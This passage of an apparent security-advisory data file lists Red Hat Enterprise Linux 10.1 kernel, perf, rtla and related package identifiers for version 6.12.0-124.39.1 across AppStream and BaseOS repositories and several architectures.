"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
